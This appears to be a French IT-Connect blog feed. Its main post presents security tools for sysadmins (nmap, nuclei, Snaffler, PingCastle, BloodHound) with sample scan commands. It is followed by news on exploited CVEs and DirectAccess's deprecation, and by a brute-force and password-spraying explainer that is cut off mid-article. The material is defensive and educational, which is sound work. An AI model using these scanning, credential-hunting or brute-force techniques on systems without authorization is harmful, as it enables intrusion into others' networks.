I. Présentation

Dans cet article, je vous propose un ensemble d'outils et de ressources permettant d'évaluer et de tester la sécurité de votre système d'information. Mon objectif de fournir aux administrateurs système les principaux outils que je juge utiles et techniquement abordables pour réaliser cette tâche.

L'objectif de sécurisation de son système d'information peut paraitre abstrait ou lointain lorsque l'on ne se frotte pas quotidiennement à la cybersécurité, qui est devenue un métier à part entière de l'informatique au sens général. Néanmoins, chaque acteur du système d'information a son rôle à jouer au sujet de la cybersécurité, de manière plus ou moins forcée en fonction des budgets, tailles d'équipe ou autres contraintes spécifiques à chaque cas et entreprise.

L'idée de cet article est de vous fournir les premiers éléments de réponse et options à suivre pour vous lancer sur ce chemin, notamment si vous souhaitez ou devez ajouter une corde "cybersécurité" à votre arc sans pour autant devenir un expert à plein temps sur le sujet.

La connaissance de ces outils et ressources présentées dans cet article n'est, en soit, pas suffisante pour la réalisation d'un test d'intrusion ou d'une opération red team en bonne et due forme. En revanche, ceux-ci sont tout à fait maitrisables pour des administrateurs systèmes et réseau, et, utilisés de manière relativement standard, pourront déjà permettre de détecter et de corriger les vulnérabilités les plus visibles d'un système d'information.

Cette liste contient uniquement des outils gratuits ou utilisés dans leur version gratuite, pour plusieurs raisons, la principale étant la volonté de partager des solutions utiles et utilisables par tous.

II. Disclaimer

Quel que soit l'outil dont il est question, il est important d'être au fait qu'une simple exécution occasionnelle sans analyse précise ou capacité à interpréter les résultats ne sert à rien. Soyez bien clair sur plusieurs points :

• Avant d'utiliser n'importe lequel de ces outils, il faut être certains de comprendre ce pour quoi il est fait, ce qu'il est capable de détecter, voire d'exploiter, et quelles sont ses limites (faux positifs, périmètre d'action). S'il y a une quelconque incompréhension de votre part concernant la description de l'outil et son fonctionnement global, c'est qu'il n'est pas encore temps de l'utiliser en conditions réelles.
• Il est aussi important d'être capable d'interpréter les résultats de chacun de ces outils afin de comprendre ce qui est urgent, ce qui est incertain, ce qui est secondaire, etc. À ce titre, il faut être conscient de ses propres limites quant à leur utilisation et l'interprétation de leur résultat.
• L'utilisation de ces outils, pour certains offensifs, ne doit être effectuée uniquement sur des cibles pour lesquelles vous disposez d'une autorisation explicite. Pour rappel : Code pénal : Chapitre III : Des atteintes aux systèmes de traitement automatisé de données

L'utilisation de ces outils peut ainsi être un premier pas vers une phase de diagnostic ou de contrôle routinier de la sécurité du système d'information. Cependant, elle ne peut pas être un substitut à l'analyse d'un expert en cybersécurité, qu'il soit interne ou externe à l'entreprise. Par exemple, l'utilisation avec les options "standard" ou "par défaut" peut vous faire passer à côté d'une vulnérabilité qui ne serait détectable qu'à travers une analyse approfondie, ou l'utilisation d'options plus avancées.

Il est donc important d'être en phase avec ces différents points pour éviter d'avoir un faux sentiment de sécurité. Cet avertissement étant fait, nous pouvons passer à la suite !

III. Ma liste d'outils pour sécuriser SI en tant qu'administrateur système

A. Scan réseau : nmap

nmap est la référence absolue des outils de scan réseau ! Il permet d'effectuer une reconnaissance et une cartographie du système d'information en découvrant les hôtes accessibles sur un réseau local ou distant ainsi que les services exposés. À ce titre, il permet également d'effectuer une analyse de cloisonnement pouvant exister entre deux réseaux en évaluant de manière pragmatique l'efficacité et l'exhaustivité d'une politique de filtrage.

L'utilisation de nmap peut donc permettre de voir si un hôte situé sur un réseau peut accéder aux services d'un autre hôte du réseau local ou sur un réseau distant. Voici, en exemple, une commande classique d'utilisation de nmap et les résultats d'un scan sur un hôte unique, visant à découvrir les services exposés et procéder à des premières actions d'énumération sur ceux-ci :

On retrouve notamment différentes colonnes indiquant, dans l'ordre : le protocole et port scanné, son status (open/closed/filtered), le service correspondant et une éventuelle bannière indiquant la technologie utilisée et sa version lorsque les scripts nmap ont réussi à les identifier avec précision.

En plus de ces fonctionnalités principales, nmap possèdent également de nombreux modules sous forme de scripts qui permettent de détecter les types de services exposés (est-ce un service web, un service SSH ou RDP ? etc...), mais également leur version. Ces scripts, écrits en LUA et utilisables tels quels, permettent également d'effectuer un scan de vulnérabilité élémentaire, par exemple, en relevant la présence d'une version obsolète, d'une authentification anonyme ou la présence d'une configuration particulière vulnérable.

De manière élémentaire, nmap peut aider à répondre aux questions suivantes :

• Pour un poste situé dans le réseau "utilisateur", combien de systèmes et services de mon système d'information lui sont accessibles ?
• La politique de filtrage et de cloisonnement que j'ai définie est-elle implémentée telle qu'attendu ?
• Si un attaquant prend le contrôle d'un poste de l'équipe RH, peut-il directement joindre mon serveur de sauvegarde ?
• Existe-t-il des services exposés sur le réseau "serveurs" qui ne sont pas à jour ?
• Y-a-t-il sur mon réseau des services SMB ou FTP accessibles en authentification anonyme ?

Enfin, celui-ci nécessite forcément des connaissances en systèmes et en réseau. C'est notamment le cas lorsqu'il s'agit de tester la bonne application d'une politique de filtrage réseau ou d'identifier les services exposés grâce à leur port (TCP/UDP). La sortie qu'il produit peut dans un premier temps paraitre non intuitive, mais le résultat est en fait assez claire, si l'on prend la peine de s'y familiariser.

• Lien vers l'outil : Site officle de nmap

Apprenez à utiliser Nmap avec notre cours complet :

• Cours Nmap

B. Scan web : nuclei

Nuclei fait partie de mes outils préférés lorsqu'il s'agit de faire des scans web automatisés et de dégrossir l'analyse d'un grand nombre de cibles, principalement parce que j'apprécie son fonctionnement modulaire et le développement communautaire de ses templates de test. Il s'agit d'un scanner utilisant des modules écrit en Yaml écrit par la communauté.

Il est très simple d'utilisation et plutôt efficace. Son objectif est de vous permettre de scanner un ou plusieurs sites en effectuant un grand nombre de tests qui sont clairement définis. Ces tests, sous forme de module donc, sont majoritairement orientés autour :

• de la détection de version et la présence de logiciels, plugins ou dépendances obsolètes.
• de la présence de défaut de configuration, tels que le Directory Listing, l'absence d'options de sécurité sur les cookies, l'absence d'en-tête de sécurité au niveau du service web, etc.
• la recherche de fichiers sensibles qui ne devraient pas être exposés, comme un fichier "docker-composer.yml" contenant un mot de passe, un fichier "phpinfo()", etc.
• la découverte de CVE reposant sur des éléments de détection simples.

Voici un exemple d'utilisation de nuclei, qui peut aussi bien prendre en entrée un site web qu'un fichier contenant plusieurs centaines de domaines :

# Scanner un site web
nuclei -u https://www.monsiteweb.fr
# Scan les URL/domaine inscrits dans un fichier
nuclei --list /tmp/url.txt

Nuclei va faire une analyse en utilisant ses modules (appelés templates). Nous pouvons spécifier ceux que nous souhaitons utiliser via les options, ou laisser nuclei les choisir automatiquement en fonction de ses découvertes. Si nuclei détecte les traces du CMS WordPress, il va automatiquement exécuter tous les modules portant le tag "wordpress".

Voici un exemple d'utilisation d'un module. Nous souhaitons effectuer une vérification très précise sur toutes nos applications web exposées, en recherchant l'exposition d'un "PhpMyAdmin" :

nuclei --list /tmp/url.txt -t http/exposed-panels/phpmyadmin-panel.yaml

C'est cette possibilité de pouvoir sélectionner précisément un test ou catégorie de test sur un site précis ou un grand ensemble de site qui le rend très pratique d'utilisation. Voici, par exemple, le cas d'utilisation de toute une catégorie de template permettant de rechercher les technologies à partir du contenu des pages web et des bannières. On spécifie ici une catégorie qui contient plus de 300 modules :

Au delà des simples découvertes de bannières ou de fichiers, certaines catégories de modules sont orientées sur la découverte de CVE, voici un exemple :

Vous pourrez en apprendre plus sur les templates de test nuclei simplement en parcourant leur configuration Yaml : Github - Nuclei-templates

Il faut cependant être conscient de la limite des scans automatisés : ceux-ci sont très surfaciques et permettent uniquement de relever des vulnérabilités basiques. Ne vous attendez pas, par exemple, à découvrir une injection SQL ou un problème de cloisonnement des droits entre profils utilisateurs grâce à nuclei. Vous serez en revanche certain d'avoir des résultats et des éléments à corriger si vous exécutez ce genre de scan pour la première fois sur un SI qui n'a jamais été à l'épreuve d'une cyberattaque/d'un audit.

Dans la réalité d'un test d'intrusion ou d'une opération red team, les scans automatisés sont utilisés pour dégrossir le travail, repérer les cibles les plus faibles et avoir une première idée du niveau de sécurité global. Ils sont rarement, voir jamais utilisés dans le cadre de cyberattaques réelles pour des problématiques évidentes de discrétion.

• Lien vers l'outil : Github - ProjectDiscovery/Nuclei

Apprenez à utiliser Nuclei avec notre tutoriel complet :

• Tutoriel - Nuclei - Rechercher des vulnérabilités dans une application web

C. Analyse des partages et permissions avec Snaffler

Snaffler est un exécutable Windows qui vise à automatiser la découverte des partages de fichiers des systèmes sur un domaine, puis la recherche d'informations sensibles dans ces partages. Ses règles par défaut, qui sont hautement personnalisables, sont orientées autour des fichiers techniques contenant des mots de passe, des configurations, des archives, crashdump, disques virtuels, etc. Tout type de fichier dans lequel un attaquant pourrait trouver des informations intéressantes.

C'est un outil très efficace qui ne manque jamais à remonter des informations intéressantes, tant la tâche de sécurisation et difficile à atteindre. Il permet notamment d'automatiser une tâche colossale : naviguer dans la totalité des partages de fichiers, dossiers et sous-dossiers d'un système d'informations. Exécuter régulièrement sur un système d'informations, en utilisant des comptes utilisateurs de privilèges différents, il permettra d'être un peu plus confiant sur l'absence d'informations sensibles dans les partages de fichiers, notamment ceux accessibles en lecture par tous les utilisateurs du domaine.

Voici un exemple de lancement de Snaffler et des premiers résultats qu'il peut afficher (Cliquez sur l'image pour zoomer) :

Dans cet exemple, on voit que Snaffler réalise dans un premier temps une énumération et recherche des partages de fichiers des systèmes de mon domaine, puis recherche des données sensibles à l'intérieur de ceux-ci. La dernière ligne (marquées en {Red}) est une trace typique de la découverte d'un mot de passe dans un script accessible dans le partage concerné.

• Lien vers l'outil : Github - SnaffCon/Snaffler

Apprenez à utiliser Snaffler avec notre tutoriel complet :

• IT-Connect - Analysez vos partages de fichiers Active Directory avec Snaffler pour protéger vos données

D. Diagnostique et conformité de l'Active Directory avec PingCastle

PingCastle est un exécutable Windows orienté autour des vérifications de conformité et de bonnes pratiques de configuration de l'Active Directory, élément plus que central dans la sécurisation d'un système d'information. Dans son utilisation la plus commune, il permet de faire une analyse globale de la sécurité de l'AD suite une collecte d'information automatisée. Cette analyse porte notamment sur les utilisateurs, groupes, système d'exploitation, GPO, les permissions et appartenance aux groupes, mais aussi des éléments plus techniques comme la conformité à l'état de l'art concernant des paramètres bien précis :

Lors de l'analyse de la sécurité d'un système d'information, il s'agit réellement d'un incontournable sur le sujet. Une des grandes forces de l'outil est également son rapport, au format web, qui contient une notation globale, une catégorisation des points de vérification et faiblesses découvertes, ainsi que des recommandations et références externes qui permettent de mieux comprendre l'impact des faiblesses découvertes et le sens des recommandations proposées.

Son utilisation est, elle aussi, très simple, depuis un poste intégré au domaine, voici comment l'exécuter :

.\Pingcastle.exe --healthcheck

Comme vous le voyez dans la sortie ci-dessous, celui-ci va réaliser une collecte et une analyse des données de l'Active Directory. il produira ensuite un rapport HTML :

Enfin, voici un exemple de résultat. Ce premier exemple vous montre la synthèse générale du niveau de risque du domaine déterminé par PingCastle à la suite de son analyse :

Ce second exemple vous expose le cas d'une vulnérabilité précise, avec notamment une description, un détail de l'impact, de la recommandation, des objets concernés :

N'hésitez pas ici à consulter les ressources qui sont référencées par PingCastle pour en apprendre plus sur ce qu'est, dans cet exemple, la vulnérabilité ASREPRoast (ou alors, consultez notre article sur le sujet : IT-Connect - Sécurité de l’Active Directory : comprendre et se protéger de l’attaque ASREPRoast).

Une bonne pratique consiste, par exemple, à réaliser une analyse tous les trimestres et de prendre en compte les recommandations proposées, en commençant bien sûr par les plus urgentes.

• Lien vers l'outil : SIte officiel - PingCastle

Pour aller plus loin dans la compréhension de ce très bon outil, je vous oriente vers nos articles sur le sujet, ainsi que vers Purple Knight qui est une alternative :

• IT-Connect - Comment auditer l’Active Directory avec PingCastle ?
• IT-Connect - Sécurité Active Directory : comment atteindre un score de 0/100 dans PingCastle ?
• IT-Connect - Comment auditer l'Active Directory avec Purple Knight ?
• Youtube - IT-Connect : Auditez votre Active Directory en 5 minutes avec PingCastle !

E. Recherche des chemins d'attaque dans l'Active Directory avec BloodHound

Bloodhound est une application web couplée à une base Neo4j qui permet de visualiser les relations qui existent entre les nombreux objets d'un domaine (utilisateurs, groupes, ordinateurs, etc.) et d'y rechercher des chemins d'attaque. Il permet notamment de répondre à une complexité inhérente aux annuaires Active Directory, qui est la succession de relations qui peuvent exister entre plusieurs objets, par l'intermédiaire d'appartenance à des groupes, de présence de session sur un poste, de privilèges et ACL spécifiques, etc. Grâce à BloodHound, ces relations parfois très indirectes, mais bien existantes peuvent être identifiées et visualisées simplement. Voici un exemple :

Ce type de relation, qui permet de comprendre que l'utilisateur "[email protected]" est finalement membre du groupe "ADMINS DU DOMAINE" de façon indirecte, n'est pas aisée à visualiser, encore moins à découvrir à l'aide des outils natifs Microsoft. Dans la réalité, cela représente un chemin potentiel pour un attaquant, qui, ayant compromis le compte utilisateur initial, fini par obtenir le plus haut niveau de privilège au sein du domaine : Administrateur du domaine.

BloodHound est un outil puissant, initialement créé par des attaquants/pentesters, mais qui est très utile entre les mains des administrateurs de l'Active Directory une fois maitrisé. Il permet de découvrir des chemins d'attaque parfois complexes et insoupçonnés, notamment grâce à une nouvelle façon de parcourir, visualiser et rechercher dans les données (la théorie des graphes).

Dans les grandes lignes, BloodHound va se baser sur les données de l'Active Directory, que l'on devra collecter pour lui via un agent appelé Collecteur. Il va ensuite stocker ces données dans une base de données neo4j, utilisant le langage de base de données Cypher pour y appliquer des recherches et des filtres, et un front-end en Sigma.js/Go nous permettra de les afficher et de les manipuler. Voici un exemple plus complet et réaliste (cliquez sur l'image pour zoomer) :

Cette vue vous montre de nombreux chemins d'attaque avec des nœuds de différents types (OU, Ordinateur, Utilisateur) et des relations différentes entre ces nœuds (possibilité d'ajouté un membre, de changer un attribut, de lire les attributs sensibles, de se connecter en RDP, d'être propriétaire d'un autre objet, etc.).

• Lien vers l'outil : Github - BloodHound

Pour maitriser cet outil de A à Z, je vous oriente vers notre cours gratuit dédié à BloodHound :

• Cours BloodHound

IV. Les ressources

L'idée à travers le partage de ces ressources est de vous fournir une liste de bases de connaissances utiles pour comprendre et interpréter les résultats fournis par les outils listés ci-dessus. Également, certaines d'entre elles pourront vous orienter vers les principaux tester à réaliser, ou vous fournir des éléments complémentaires de compréhension concernant les remédiations.

A. Active Directory Mindmap

Cette mindmap, que je vous conseille d'ouvrir localement avec le logiciel "Xmind", représente de manière très concrète la démarche globale et les différentes opérations classiques d'un attaquant. Elle a été conçue par des experts en cybersécurité et tests d'intrusion comme un pense-bête ou méthodologie pour la réalisation d'un test d'intrusion. Un test d'intrusion étant une prestation consistant à simuler une cyberattaque sur un système d'information d'entreprise, la démarche, les outils et les attaques menées sont très proches de la réalité.

Ainsi, suivre la lecture de cette mindmap vous donnera une idée de ce qui peut être tenté par les attaquants si vous n'êtes pas familier de la sécurité offensive, avec autant de points de sécurisation et de contrôle potentiels. Ce genre d'outil, fait pour les attaquants, présente l'avantage par rapport aux guides de bonnes pratiques de se baser uniquement sur actions réelles et concrètes.

Pour une personne non experte en cybersécurité, cette mindmap peut être difficile à appréhender et à comprendre dans son ensemble. Mais, l'étudier permettra cependant de retrouver, pour partie, certains des outils exposés dans cet article ou des types de faiblesses et d'attaques que les outils de globaux de scan comme PingCastle, nuclei ou nmap peuvent identifier.

L'exemple ci-dessus vous montre une partie des tests réalisés en boite noire, c'est-à-dire sans compte sur le domaine et en étant uniquement connecté au réseau interne de l'entreprise. On y retrouve bien sûr l'utilisation de l'outil nmap pour la réalisation d'une cartographie du réseau.

• Lien vers la ressource : Github - Orange Cyberdéfense AD Mindmap

B. Framework MITRE ATT&CK

Le framework ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) du MITRE est une base de connaissances des techniques d'attaque maintenue et mise à jour grâce aux observations et investigations des cyberattaques effectuées à travers le monde. Elle vise à fournir à tous un référentiel des opérations des attaquants afin de mieux les comprendre, les étudier, et s'en protéger.

Vous trouverez notamment dans cette base de données, un peu intimidante au début, de nombreuses informations sur ce qu'un attaquant est capable et susceptibles de réaliser comme attaque sur un système d'information :

Plusieurs des outils cités dans cet article utilisent notamment des références au MITRE ATT&CK et ses TTP (Tactics, Technics & Procedures, nom donné à chaque type d'attaque référencé) pour expliciter la menace que représente un défaut de configuration ou une autorisation trop permissive.

Voici un exemple de TTP, qui explicite l'attaque consiste à effectuer un brute force de mot de passe sur un compte utilisateur :

Chaque TTP contient notamment une description, des outils susceptibles d'être utilisé, des exemples de groupes de cyberattaques réels ayant utilisé cette technique par le passé et une liste de recommandation pour se protéger et détecter l'opération en question :

• Lien vers la ressource : framework MITRE ATT&CK

C. Points de contrôle Active Directory

Le référentiel de l'ANSSI sur les points de contrôle de l'Active Directory est également une très bonne ressource à connaitre pour évaluer la sécurité de son domaine.

En complément des outils d'analyse comme PingCastle et BloodHound, le contenu des recommandations proposées et leur priorisation permet d'avoir une base de travail pour analyse la sécurité de son Active Directory et expliciter certains points identifiés par les outils cités dans cet article :

Les différents points de contrôle y sont triés par priorité et accompagnés d'une recommandation pour vous orienter sur l'application des correctifs. Vous pourrez parfois faire un lien direct entre les points de contrôle PingCastle est ceux de l'ANSSI.

• Lien vers la ressource : ANSSI - Points de contrôle Active Directory

V. Conclusion

Nous avons fait le tour de ce que je considère être les principaux outils offensifs que les administrateurs système et réseau peuvent utiliser afin de prendre la température du niveau de sécurité de leur système d'information. Il en existe beaucoup d'autres, souvent plus complexes, mais maitriser ceux présentés ici vous fera certainement avancer dans le bon sens quant à la sécurité de votre système d'information et de votre domaine.

N'hésitez pas à utiliser les commentaires et le Discord pour partager votre avis !

The post Sécuriser son SI : Top 2024 des outils indispensables pour les sysadmins first appeared on IT-Connect.

Avis aux utilisateurs de smartphones Google Pixel : une faille de sécurité importante déjà exploitée au sein de cyberattaques a été corrigée par Google ! Voici ce qu'il faut savoir.

Google a mis en ligne un énorme patch de sécurité pour corriger près de 50 vulnérabilités dans le firmware de ses appareils Pixel. Elles viennent s'ajouter à celles corrigées dans Android. L'une de ces failles de sécurité mérite une attention particulière : la CVE-2024-32896. Considérée comme importante, elle permet d'effectuer une élévation de privilèges sur l'appareil Pixel.

Avant même que ce correctif soit mis en ligne par Google, elle aurait été exploitée en tant que faille zero-day par des cybercriminels. Dans le bulletin de sécurité publié par l'entreprise américaine, voici ce que nous pouvons lire : "Il semblerait que CVE-2024-32896 fasse l'objet d'une exploitation limitée et ciblée." - Comme à son habitude, Google n'a pas donné de précisions supplémentaires afin de protéger ses utilisateurs. Mais, cette phrase laisse entendre qu'il s'agirait d'attaques ciblées.

Le correctif de juin 2024 pour les appareils Pixel est déjà disponible et Google a commencé à le distribuer auprès de ses appareils. Bien entendu, les utilisateurs sont encouragés à installer cette mise à jour dès que possible : "Tous les appareils Google pris en charge recevront une mise à jour au niveau du correctif 2024-06-05. Nous encourageons tous les clients à accepter ces mises à jour sur leurs appareils."

Bien que Google soit à l'origine des appareils Pixel et du système d'exploitation Android, il y a des mises à jour distinctes pour les deux produits. En effet, bien que les smartphones Pixel tournent sur Android, ils utilisent une plateforme matérielle spécifique à Google qui implique des correctifs dédiés. Que ce soit pour la sécurité ou les simples bugs.

Arm : une alerte du côté du GPU Mali

Par ailleurs, des chercheurs en sécurité ont émis une alerte au sujet d'une faille de sécurité présente dans le pilote du noyau du GPU Arm Mali. Associée à la référence CVE-2024-4610, cette vulnérabilité serait activement exploitée dans la nature. Vous pouvez retrouver le bulletin de sécurité sur cette page.

Enfin, voici les produits affectés :

• Bifrost GPU Kernel Driver : toutes les versions de r34p0 à r40p0
• Valhall GPU Kernel Driver : toutes les versions de r34p0 à r40p0

Source

The post Google Pixel : une faille de sécurité exploitée dans des cyberattaques ciblées ! first appeared on IT-Connect.

Un nouveau rapport de Symantec laisse entendre que le gang de ransomware Black Basta aurait exploité une faille de sécurité dans Windows avant même que celle-ci soit connue et corrigée par Microsoft. Elle facilite l'élévation de privilèges sur une machine Windows. Faisons le point !

Si vous n'avez pas installé les mises à jour Windows sur vos postes de travail et serveurs depuis plusieurs mois, cet article pourrait bien vous faire changer d'avis. La faille de sécurité CVE-2024-26169, corrigée par Microsoft le 12 mars 2024 via le Patch Tuesday, aurait été exploitée en tant que zero-day par les cybercriminels de Black Basta.

Présente dans le service de signalement des erreurs de Windows (Windows Error Reporting Service), cette vulnérabilité permet à un attaquant d'élever ses privilèges en tant que "SYSTEM" sur une machine locale. C'est d'ailleurs précisé sur le site de Microsoft : "Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait obtenir les privilèges SYSTEM."

Une faille de sécurité exploitée par le ransomware Black Basta

Bien que Microsoft considère que cette faille de sécurité n'est pas exploitée par des pirates, le dernier rapport de Symantec affirme le contraire. D'ailleurs, voici la première phrase de ce rapport : "Certains éléments suggèrent que des attaquants liés à Black Basta ont compilé l'exploit CVE-2024-26169 avant la sortie du correctif" (de Microsoft).

Récemment, les experts de Symantec ont analysé un outil d'exploitation utilisé au sein de plusieurs cyberattaques. Tout porte à croire que cet outil a été compilé et exploité bien avant que le patch de Microsoft soit disponible.

Au-delà de son fonctionnement purement technique, ce qui est intrigant, ce sont les horodatages de compilation des deux versions de l'outil d'exploitation analysées par Symantec. Le premier est daté du 27 février 2024, tandis que le second a été compilé encore plus tôt, le 18 décembre 2023. Soit entre 14 et 85 jours avant la publication du correctif de sécurité de Microsoft !

Cet horodatage est modifiable, mais Symantec pense que ce n'a pas été le cas ici : "Toutefois, dans le cas présent, les auteurs de l'attaque ne semblent guère motivés pour modifier l'horodatage à une date antérieure.", peut-on lire.

Cet exploit a été utilisé pour compromettre des machines sous Windows par l'intermédiaire de la CVE-2024-26169. Pour se protéger, il est nécessaire de mettre à jour Windows : la vulnérabilité en question a été corrigée avec les mises à jour cumulatives de mars 2024. Elle affecte Windows et Windows Server.

Source

The post Le ransomware Black Basta aurait exploité une faille Windows en tant que zero-day ! first appeared on IT-Connect.

Microsoft affirme que la fonctionnalité DirectAccess est obsolète et qu'elle sera supprimée d'une future version de Windows. À la place, vous devez vous orienter vers la fonctionnalité "Always on VPN". Faisons le point.

Introduite dans Windows 7 et Windows Server 2008 R2, la fonctionnalité DirectAccess offre la possibilité à une machine intégrée à un domaine Active Directory d'être constamment connectée au réseau de l'entreprise, sans utiliser une connexion VPN classique. Le successeur de cette fonctionnalité d'accès à distance est connu depuis plusieurs années : il s'agit de la fonction Always on VPN disponible depuis Windows Server 2016 et Windows 10. Elle est également prise en charge sur les dernières versions de Windows Server et Windows 11.

Fonctionnant sur le même principe que DirectAccess (connexion au réseau de l'entreprise toujours active), Always on VPN est plus flexible et plus sécurisé puisque cette fonctionnalité prend en charge le MFA pour l'authentification, ainsi que divers protocoles VPN pour sécuriser les échanges (IKEv2, SSTP). De plus, Always on VPN présente la particularité de pouvoir être utilisé aussi bien par des machines intégrées au domaine Active Directory, que celles qui ne le sont pas.

Il y a quelques heures, Microsoft a ajouté DirectAccess à la liste des fonctionnalités obsolètes de Windows. Sur le site de l'entreprise américaine, voici ce que nous pouvons lire : "DirectAccess est obsolète et sera supprimé dans une prochaine version de Windows. Nous recommandons de migrer de DirectAccess vers Always On VPN."

Comment migrer de DirectAccess à Always on VPN ?

La documentation de Microsoft contient un guide spécial pour vous accompagner et vous conseiller dans la migration de DirectAccess vers Always on VPN. La firme de Redmond recommande aux organisations de déployer Always on VPN en parallèle de DirectAccess pour effectuer une transition en douceur.

Pour le moment, nous ne savons pas quand DirectAccess sera retiré de Windows... Aucune date n'est fournie par Microsoft. Mais, il est préférable d'anticiper ce changement pour éviter une interruption de service sur les accès distants.

Que pensez-vous de cette décision ?

Source

The post Windows : DirectAccess est obsolète, vous devez migrer vers Always On VPN first appeared on IT-Connect.

I. Présentation

Dans cet article, nous allons nous intéresser aux attaques par brute force qui peuvent être menées sur les comptes utilisateurs d'un Active Directory, d’une application web ou de tout autre service réseau.

Nous verrons en quoi consistent ces attaques et quel est le but recherché par l'attaquant, nous parcourrons les différents types de brute force qui existent et peuvent être exploités lors d'une cyberattaque en fonction de l’objectif et du niveau de discrétion recherchés. Nous aborderons enfin les principales mesures à prendre pour s'en protéger.

II. Qu'est-ce qu'une attaque par brute force ?

Une attaque par brute force, appelée aussi "bruteforce attack" ou attaque par force brute, consiste pour un attaquant à tenter d’obtenir les identifiants d’un compte utilisateur en essayant une multitude de mots de passe sur un même login. Une telle attaque se caractérise surtout par le nombre d’essais que l’attaquant va réaliser afin de tenter de compromettre un compte. Le plus souvent, il va utiliser des dictionnaires de mots de passe (appelés “wordlist”), composés de plusieurs milliers ou millions de lignes, chacune étant un mot de passe potentiel.

Dans le cadre d'une cyberattaque, l'attaquant va utiliser le brute force afin de compromettre facilement des comptes utilisateurs qui possèdent un mot de passe faible. Cette opération peut être menée en tant que première étape d'une intrusion (par exemple, sur les services de l'entreprise exposés sur Internet) ou alors en visant des services internes à l'entreprise après une première compromission.

Un “identifiant” étant composé d’un login (nom d'utilisateur) et d’un mot de passe, le fait de connaître le login est déjà une information intéressante pour un attaquant, puisqu’il va déjà être en possession de 50% de l’information nécessaire à la compromission d’un compte.

Plus concrètement pour compromettre le compte ayant le login "admin", un attaquant va essayer le couple “admin : password”, puis “admin : admin”, puis “admin : superMDP123!”, etc. Pour qu’une attaque digne de ce nom soit menée, l’attaquant automatisera le processus grâce à des programmes conçus pour ce genre d’opérations et adaptés au contexte (application web, service SSH, SMB, etc.), lui permettant de réitérer son opération d'authentification rapidement et sans effort.

Imaginez avoir en énorme trousseau de clés en main et une serrure verrouillée en face de vous. Le fait de tester toutes les clés une à une est précisément la définition d'un brute force.

Certains outils permettent aujourd’hui de tenter des milliers de combinaisons par seconde depuis un simple ordinateur. Parmi ces outils, on peut notamment citer “hydra”, “netexec” ou “metasploit”.

Le brute force est une technique d’attaque connue et fréquemment utilisée. Elle est référencée dans le framework MITRE ATT&CK sous le TTP T1110 :

• MITRE ATT&CK : T1110 – Brute Force

Cette page vous permettra notamment de trouver de nombreux cas réels d’utilisation du brute force dans des attaques étatiques ou d’envergures :

Par exemple, les attaques par brute force font partie de la méthodologie du groupe APT29 (groupe d’espionnage affilié à la Russie et ciblant les pays de l’OTAN) d’après le framework MITRE ATT&CK :

• MITRE ATT&CK – APT 29

III. Les différents types d’attaques par brute force

A. Le brute force "classique"

La plupart du temps, une attaque par brute force va cibler plusieurs comptes utilisateur, cela afin de maximiser les chances de trouver un compte ayant un mot de passe faible. L’attaquant disposera alors d’une wordlist de login (vérifiés ou potentiels) et d’une wordlist de mots de passe. Il va donc tenter chaque combinaison “login : mot de passe” :

Dans les faits, les attaque par brute force peuvent cibler tout service ou application utilisant le login et le mot de passe comme facteurs d’authentification et étant insuffisamment protégé. Cela concerna donc aussi bien les applications web et leur page de login classique, les services SSH ou encore au sein d’un système d’information l’Active Directory, qui propose à lui seul de nombreux services permettant une authentification (Kerberos, SMB, RPC, LDAP, WinRM, RDP, etc.) et joue, entre autres, le rôle d'autorité d'authentification au sein d'un domaine.

Il faut ici se représenter le nombre de tentatives d’authentification que génère ce type d’attaque. Si je dispose d’une liste de 100 logins sur lesquels je souhaite tester 20 000 mots de passe. Cela signifie que mon attaque va générer 2 millions de tentatives d’authentification.

Pour être plus précis, ce type de brute force est décrit le framework MITRE ATT&CK en tant que "Bruteforce: password guessing", car l'on tente de deviner le mot de passe d'un utilisateur de façon agressive :

• T1110.00 - Bruteforce: Password Guessing

B. Le brute force ciblé

Il existe également des cas où l’attaquant va vouloir cibler un compte bien identifié, on parle alors d’attaque ciblée. Ce cas de figure s’observe notamment quand l’attaquant a identifié un compte particulièrement sensible ou hautement privilégié.

Également, ces attaques sont utilisées lorsque les services ou applications utilisent encore un compte d’administration par défaut. Par exemple, le compte “admin” d’une application web qui est le premier compte existant sur toutes les instances de celle-ci. On peut également mentionner le compte “administrateur/administrator” dans les environnements Windows (local ou au niveau du domaine).

Lors d’une attaque par brute force ciblée, l’attaquant ne va cibler qu’un seul (ou un nombre réduit) compte utilisateur, mais toujours utiliser un dictionnaire de mot de passe. Il mise alors sur le fait que ce compte précis possède un mot de passe faible, présent dans sa wordlist :

Ce type d’attaque génère naturellement moins de requêtes (cela dépend toujours du dictionnaire de mot de passe utilisé), mais n’en est pas moins efficace si le compte ciblé possède effectivement un mot de passe faible. Voici la démonstration d’une attaque par brute force ciblée sur un service SMB dans un environnement Windows Active Directory, le compte ciblé est toujours le même “IT-CONNCET.TECH\KATY_CRAFT”, mais le mot de passe change à chaque essai :

Comme vous le voyez dans cet exemple, l’outil utilisé va tenter plusieurs mots de passe et cibler le compte “IT-CONNECT.TECH\KATY_CRAFT”, jusqu’à trouver la bonne combinaison.

C. Le password spraying

Un troisième type d’attaque par brute force existe et est notamment utilisée dans le cadre des intrusions en environnement Active Directory : le password spraying.

Cette attaque consiste à tenter de s’authentifier sur de multiples comptes à l’aide d’un seul mot de passe (ou une liste très réduite de mots de passe). Le cas le plus parlant est celui où l’attaquant parvient à obtenir le fameux “premier mot de passe par défaut” qu’un administrateur peut assigner à chaque nouvel utilisateur et qu’il doit changer au plus vite, un mot de passe en général très complexe tel que “Bienvenue01.” ou “ChangezMoi!”.

En tombant sur de tels mots de passe, un attaquant peut se dire que d’autres comptes, nouvellement créés ou jamais utilisés, ont également ce mot de passe, il va donc tenter de s’authentifier sur chaque compte de l’Active Directory avec celui-ci.

Pour un attaquant, le password spraying possède un grand avantage : il évite le blocage de compte.

En effet, par défaut, certains mécanismes sont présents en environnement Active Directoy (et aussi sur certains services et applications web) et consistent à verrouiller temporairement un compte utilisateur ayant subi de trop nombreuses tentatives d’authentification infructueuses. Dès lors, les attaques de type brute force classique vont avoir pour effet de bloquer tous les comptes, ce qui bloquera l'attaque, mais perturbera les utilisateurs, et donc lèvera l’alerte.

Via le password spraying, aucun risque de blocage. Cette opération va donc utiliser un dictionnaire d’utilisateurs là où l’attaque par brute force classique va utiliser un dictionnaire de mots de passe.

Pour une description plus formelle, je vous oriente vers le TTP du MITRE dédié à ce type d’attaque :

• MITRE ATT&CK - T1110.003 - Bruteforce: Password Spraying

D. Autres techniques dérivées

